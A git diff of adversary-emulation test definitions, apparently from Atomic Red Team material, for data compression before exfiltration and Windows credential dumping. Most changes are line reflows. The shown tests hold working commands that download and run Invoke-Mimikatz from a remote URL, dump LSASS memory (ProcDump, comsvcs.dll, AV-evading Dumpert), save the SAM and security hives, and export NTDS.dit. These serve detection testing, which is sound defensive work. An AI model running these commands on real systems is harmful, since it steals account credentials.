## Atomic Test #1 - Compress Data for Exfiltration With PowerShell + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. -When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1002-data-ps.zip in the $env:USERPROFILE directory +When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called +T1002-data-ps.zip in the $env:USERPROFILE directory **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE| | output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\T1002-data-ps.zip| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ``` #### Cleanup Commands: + ```powershell Remove-Item -path #{output_file} -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Compress Data for Exfiltration With Rar + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. -When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1002-data.rar in the %USERPROFILE% directory +When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called +T1002-data.rar in the %USERPROFILE% directory **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_path | Path that should be compressed into our output file | Path | %USERPROFILE%| @@ -70,28 +66,30 @@ When the test completes you should find the txt files from the %USERPROFILE% dir | rar_installer | Winrar installer | Path | %TEMP%\winrar.exe| | rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd "#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file} >nul 2>&1 ``` - - #### Dependencies: Run with `command_prompt`! + ##### Description: Rar tool must be installed at specified location (#{rar_exe}) + ##### Check Prereq Commands: + ```cmd if not exist "#{rar_exe}" (exit /b 1) ``` + ##### Get Prereq Commands: + ```cmd echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -99,133 +97,123 @@ echo Follow the installer prompts to install Winrar #{rar_installer} ``` - - -

## Atomic Test #3 - Data Compressed - nix - zip -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard zip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt| | output_file | Path that should be output as a zip archive | Path | $HOME/data.zip| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh zip #{output_file} #{input_files} ``` #### Cleanup Commands: + ```sh rm -f #{output_file} ``` - - #### Dependencies: Run with `sh`! + ##### Description: Files to zip must exist (#{input_files}) + ##### Check Prereq Commands: + ```sh ls #{input_files} ``` + ##### Get Prereq Commands: + ```sh echo Please set input_files argument to include files that exist ``` - - -

## Atomic Test #4 - Data Compressed - nix - gzip Single File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard gzip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt| | input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}) ``` #### Cleanup Commands: + ```sh rm -f #{input_file}.gz ``` - - - -

## Atomic Test #5 - Data Compressed - nix - tar Folder or File -An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - -**Supported Platforms:** Linux, macOS - +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses +standard gzip compression. +**Supported Platforms:** Linux, macOS #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME| | output_file | File that should be output | Path | $HOME/data.tar.gz| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh tar -cvzf #{output_file} #{input_file_folder} ``` #### Cleanup Commands: + ```sh rm -f #{output_file} ``` - - #### Dependencies: Run with `sh`! + ##### Description: Folder to zip must exist (#{input_file_folder}) + ##### Check Prereq Commands: + ```sh test -e #{input_file_folder} ``` + ##### Get Prereq Commands: + ```sh echo Please set input_file_folder argument to a folder that exists ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1003.md b/Atomic_Threat_Coverage/Triggers/T1003.md index 5d395150..cf609347 100644 --- a/Atomic_Threat_Coverage/Triggers/T1003.md +++ b/Atomic_Threat_Coverage/Triggers/T1003.md @@ -1,18 +1,21 @@ # T1003 - Credential Dumping + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003) +
Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. -Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. +Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. +Additional custom tools likely exist as well. ### Windows #### SAM (Security Accounts Manager) -The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. -  +The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. +To enumerate the SAM database, system level access is required. A number of tools can be used to retrieve the SAM file through in-memory techniques: -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py 
@@ -31,11 +34,12 @@ User accounts start with a RID of 1,000+. #### Cached Credentials -The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. -  +The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain +controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. +This hash does not allow pass-the-hash style attacks. A number of tools can be used to retrieve the SAM file through in-memory techniques. -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) 
@@ -46,13 +50,13 @@ Cached credentials for Windows Vista are derived using PBKDF2. #### Local Security Authority (LSA) Secrets -With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. -  -When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. -  +With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account +credentials. The Registry is used to store the LSA secrets. +When services are run under the context of local or domain users, their passwords are stored in the Registry. If +auto-logon is enabled, this information will be stored in the Registry as well. A number of tools can be used to retrieve the SAM file through in-memory techniques. -* pwdumpx.exe +* pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py 
@@ -60,14 +64,17 @@ A number of tools can be used to retrieve the SAM file through in-memory techniq Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: -The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. +The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation. #### NTDS from Domain Controller -Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) - -The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. +Active Directory stores information about members of the domain including devices and users to verify credentials and +define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will +be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) + +The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active +Directory hashes. * Volume Shadow Copy * secretsdump.py 
@@ -76,11 +83,15 @@ The following tools and techniques can be used to enumerate the NTDS file and th #### Group Policy Preference (GPP) Files -Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts. +Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded +credentials. These policies, amongst other things, allow administrators to set local accounts. -These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP) +These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL +share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD +GPP) -The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: +The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML +files: * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) 
@@ -96,23 +107,28 @@ See [Kerberoasting](https://attack.mitre.org/techniques/T1208). #### Plaintext Credentials -After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. +After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority +Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. -SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. +SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): +A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to +applications. The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. -Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) +Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple +Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. -CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) -  +CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services. 
(Citation: Microsoft CredSSP) + The following tools can be used to enumerate credentials: * [Windows Credential Editor](https://attack.mitre.org/software/S0005) * [Mimikatz](https://attack.mitre.org/software/S0002) -As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. +As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local +system. For example, on the target host use procdump: 
@@ -120,18 +136,37 @@ For example, on the target host use procdump: Locally, mimikatz can be run: -* sekurlsa::Minidump lsassdump.dmp +* sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords #### DCSync -DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017) +DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. 
+Rather than executing recognizable malicious code, the action works by abusing the domain controller's application +programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba +DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any +members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are +able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include +current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in +turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) ( +Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted +in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) +DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) +Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec +2017) ### Linux #### Proc filesystem -The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). 
The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. +Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of +these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either +usage or brute force attacks, respectively. This functionality has been implemented in +the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired +by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and +hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache +use memory to store such authentication artifacts. ## Atomic Tests @@ -167,83 +202,75 @@ The /proc filesystem on Linux contains a great deal of information regarding the - [Atomic Test #16 - Registry parse with pypykatz](#atomic-test-16---registry-parse-with-pypykatz) -
## Atomic Test #1 - Powershell Mimikatz + Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. -Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. -Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" +Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. +Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of +the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ``` - - - - -

## Atomic Test #2 - Gsecdump + Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. -If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. +If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) -If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. +If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download +and install Gsecdump first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe| | gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe| | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{gsecdump_exe} -a ``` - - - #### Dependencies: Run with `powershell`! 
+ ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") @@ -252,27 +279,24 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash} } ``` - - -

## Atomic Test #3 - Windows Credential Editor + Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. -If you see no output it is likely that execution was blocked by Anti-Virus. +If you see no output it is likely that execution was blocked by Anti-Virus. -If you see a message saying "wce.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install Windows Credential Editor first. +If you see a message saying "wce.exe is not recognized as an internal or external command", try using the +get-prereq_commands to download and install Windows Credential Editor first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt| 
@@ -280,28 +304,30 @@ If you see a message saying "wce.exe is not recognized as an internal or externa | wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip| | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{wce_exe} -o #{output_file} ``` #### Cleanup Commands: + ```cmd del "#{output_file}" >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") @@ -312,26 +338,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ } ``` - - -

## Atomic Test #4 - Registry dump of SAM, creds, and secrets + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 -Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. +Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% +directory. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg save HKLM\sam %temp%\sam @@ -340,60 +360,59 @@ reg save HKLM\security %temp%\security ``` #### Cleanup Commands: + ```cmd del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul ``` - - - -

## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. -If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. +If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the +get-prereq_commands to download and install the ProcDump tool first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003\bin\procdump.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{procdump_exe} -accepteula -ma lsass.exe #{output_file} ``` #### Cleanup Commands: + ```cmd del "#{output_file}" >nul 2> nul ``` - - #### Dependencies: Run with `powershell`! + ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -401,182 +420,172 @@ New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force ``` - - -

## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full ``` #### Cleanup Commands: + ```powershell Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore ``` - - - -

## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking -The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. + +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system +calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp. -If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first. +If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download +the tool first. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{dumpert_exe} ``` #### Cleanup Commands: + ```cmd del C:\windows\temp\dumpert.dmp >nul 2> nul ``` - - #### Dependencies: Run with `powershell`! 
+ ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} ``` - - -

## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. **Supported Platforms:** Windows +#### Run it with these steps! - - -#### Run it with these steps! 1. Open Task Manager: - On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking - on the task bar and selecting "Task Manager". + On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking + on the task bar and selecting "Task Manager". 2. Select lsass.exe: - If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe - and select it for manipulation. + If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of + lsass.exe + and select it for manipulation. 3. Dump lsass.exe memory: - Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. - - - - - - + Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to + the saved file.

## Atomic Test #9 - Offline Credential Theft With Mimikatz -The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with -Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. - -**Supported Platforms:** Windows - +The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline +analysis with +Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the +get-prereq_commands. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003\bin\mimikatz.exe| | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd #{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit ``` - - - #### Dependencies: Run with `powershell`! 
+ ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ``` + ##### Description: Lsass dump must exist at specified location (#{input_file}) + ##### Check Prereq Commands: + ```powershell cmd /c "if not exist #{input_file} (exit /b 1)" ``` + ##### Get Prereq Commands: + ```powershell Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" ``` - - -

## Atomic Test #10 - Dump Active Directory Database with NTDSUtil + This test is intended to be run on a domain Controller. -The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability +The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This +capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. @@ -584,108 +593,96 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` - - -

## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd vssadmin.exe create shadow /for=#{drive_letter} ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` - - -

